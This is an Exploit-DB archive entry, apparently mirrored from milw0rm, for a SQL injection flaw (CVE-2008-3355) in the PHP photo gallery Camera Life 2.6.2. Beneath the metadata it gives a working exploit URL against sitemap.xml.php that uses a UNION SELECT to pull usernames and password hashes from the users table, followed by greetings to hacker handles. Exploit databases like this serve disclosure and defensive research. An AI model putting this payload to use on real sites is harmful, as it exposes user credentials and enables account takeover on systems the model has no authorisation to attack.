Camera Life 2.6.2 - 'id' SQL Injection

Author: nuclear
type: webapps
platform: php
port: 
date_added: 2008-07-24  
date_updated: 2016-12-26  
verified: 1  
codes: OSVDB-47150;CVE-2008-3355  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comcameralife-2.6.2aa.zip  

raw file: 6132.txt  

#Camera Life 2.6.2(id) Sql Injection Vulnerability



#Author: nuclear



#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip



#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --



#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P

# milw0rm.com [2008-07-25]